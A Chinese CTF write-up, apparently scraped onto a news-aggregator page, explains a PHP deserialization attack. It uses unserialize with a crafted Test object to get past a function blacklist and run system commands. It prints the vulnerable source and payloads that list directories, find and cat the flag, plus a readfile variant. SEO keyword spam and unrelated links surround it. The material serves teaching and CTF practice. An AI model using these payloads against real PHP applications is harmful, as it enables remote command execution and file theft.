当前位置: 首页 > news >正文

嘉兴城乡建设局网站保定小程序开发公司

news 2026/5/8 18:43:15
嘉兴城乡建设局网站,保定小程序开发公司,安全的营销型网站建设,怎么做网站打赏打开题目 我们发现这个页面一直在不断的刷新 我们bp抓包一下看看 我们发现index.php用post方式传了两个参数上去#xff0c;func和p 我们需要猜测func和p两个参数之间的关系#xff0c;可以用php函数MD5测一下看看 我们在响应处得到了一串密文#xff0c;md5解密一下看看 发…打开题目 我们发现这个页面一直在不断的刷新 我们bp抓包一下看看 我们发现index.php用post方式传了两个参数上去func和p 我们需要猜测func和p两个参数之间的关系可以用php函数MD5测一下看看 我们在响应处得到了一串密文md5解密一下看看 发现页面回响的内容就是123的md5加密后的内容 那我们直接看看能不能执行system函数 可以看到system函数被过滤掉了 那我们尝试一下能不能直接读取到网站源代码 file_get_contents() 得到 代码如下 ?php$disable_fun array(exec,shell_exec,system,passthru,proc_open,show_source,phpinfo,popen,dl,eval,proc_terminate,touch,escapeshellcmd,escapeshellarg,assert,substr_replace,call_user_func_array,call_user_func,array_filter, array_walk, array_map,registregister_shutdown_function,register_tick_function,filter_var, filter_var_array, uasort, uksort, array_reduce,array_walk, array_walk_recursive,pcntl_exec,fopen,fwrite,file_put_contents);function gettime($func, $p) {$result call_user_func($func, $p);$a gettype($result);if ($a string) {return $result;} else {return ;}}class Test {var $p Y-m-d h:i:s a;var $func date;function __destruct() {if ($this-func ! ) {echo gettime($this-func, $this-p);}}}$func $_REQUEST[func];$p $_REQUEST[p];if ($func ! null) {$func strtolower($func);if (!in_array($func,$disable_fun)) {echo gettime($func, $p);}else {die(Hacker...);}}? 我们代码审计一下 $func $_REQUEST[func];     $p $_REQUEST[p];     if ($func ! null) {                   //判断func不为空         $func strtolower($func);     //将func转换为小写         if (!in_array($func,$disable_fun)) {     //搜索func是否含有黑名单的值             echo gettime($func, $p);           //如果func没有存在黑名单的值就执行gettime函数         }else {             die(Hacker...);             //有则输出Hacker function gettime($func, $p) {         $result call_user_func($func, $p);        //这里可以看出是回调函数         $a gettype($result);                      //这里用gettype函数对result处理后赋值给a         if ($a string) {                            //如果a的类型是字符串             return $result;                               //返回reslut的结果         } else {return ;}                            //否则返回空值 那咱们就可以使用反序列化因为我们这个命令是用不了的func有很多黑名单限制 构造payload ?php class Test {var $p ls;var $func system; } $a new Test(); echo serialize($a); ?用phpstudy打开得到payload payload为 funcunserializepO:4:Test:2:{s:1:p;s:2:ls;s:4:func;s:6:system;} 得到 修改payload funcunserializepO:4:Test:2:{s:1:p;s:4:ls /;s:4:func;s:6:system;} 还是没找到flag 继续修复payload其中 flag* 是一个通配符表示以 flag 开头的文件名。 funcunserializepO:4:Test:2:{s:1:p;s:18:find / -name flag*;s:4:func;s:6:system;} 直接读取flag funcunserializepO:4:Test:2:{s:1:p;s:22:cat /tmp/flagoefiu4r93;s:4:func;s:6:system;} 或者readfile funcreadfilep/tmp/flagoefiu4r93 知识点 读取网站源代码的函数有 file_get_contents() show_source() highlight_file() strtolower()函数 在PHP中字符串函数strtolower () 将字符串转化为小写 in_array()函数 in_array() 函数搜索数组中是否存在指定的值。 call_user_func函数 call_user_func — 把第一个参数作为回调函数调用 详情参考PHP: call_user_func - Manual gettype函数 gettype()函数必须先给它传递一个变量。它将确定变量的类型并且返回一个包含类型名称的字符串bool、int、double、string、array、object和resource。如果变量类型不是标准类型之一该函数就会返回“ unknown type未知类型”。 读取文件内容的命令 cat filename readfile filename 查找文件的命令 详情见Linux下查找文件find、grep命令_linux查找文件_GG_Bond19的博客-CSDN博客 find 路径 -name 文件名 例如 find / -name flag* 其中 flag* 是一个通配符表示以 flag 开头的文件名。 find / -name .*txt 其中 .*txt 是一个通配符表示以 .txt 结尾的隐藏文件
http://www.hkea.cn/news/14585051/

相关文章:

  • 江西住房与城乡建设厅网站wordpress的主题是什么
  • 网站的功能定位做这种灰色的网站犯法
  • 微信网站流程一年的百度指数
  • 四川省住房和城乡建设厅官方网站php 除了做网站
  • 网站建设比较好的公司都有哪些wordpress sparkling
  • 网站开发的接口文档品牌广告策划方案
  • 做新零售这些注册网站和找货源徐州做网站的公司有几家
  • 互联网公司排名100强2021谷歌seo网站推广
  • 域名建设好了怎么在建设网站河北网络科技公司有哪些
  • 济南网站制作网站沈阳市网站设计公司大全
  • 不懂编程如何做网站房价必涨的十大城市
  • 网站后台密码在哪个文件珠海金泉做网站号公司或个人码
  • wordpress多站点建站山西seo推广
  • 有没有专门做衣服搭配的网站装修设计图免费软件
  • 通化市建设工程招投标网站东莞大朗网站设计
  • 网站建设和维护的职责专门做特卖的网站是什么
  • 遵义市做网站公司门头效果图制作
  • 汽车精品设计网站建设专做医药中间体的网站
  • 网络营销型网站策划郑州网站排名服务
  • 建筑模型网站企业建站公司哪里找
  • 网站反链dede后台做两个网站
  • 如何选择响应式网站外链网盘下载
  • 公司自己做网站推广灯光设计师培训
  • 集团网站风格苏州网站建设
  • 站长之家官网查询网站开发质量控制计划
  • 短视频网站php源码免费标智客logo在线设计生成器免费
  • 学做网站要学多久海外购物网站哪个最好
  • 精品建设课程网站wordpress4.7.10漏洞
  • 长春哪些企业没有网站在线购物商城平台
  • 网站开发确认书门窗 东莞网站建设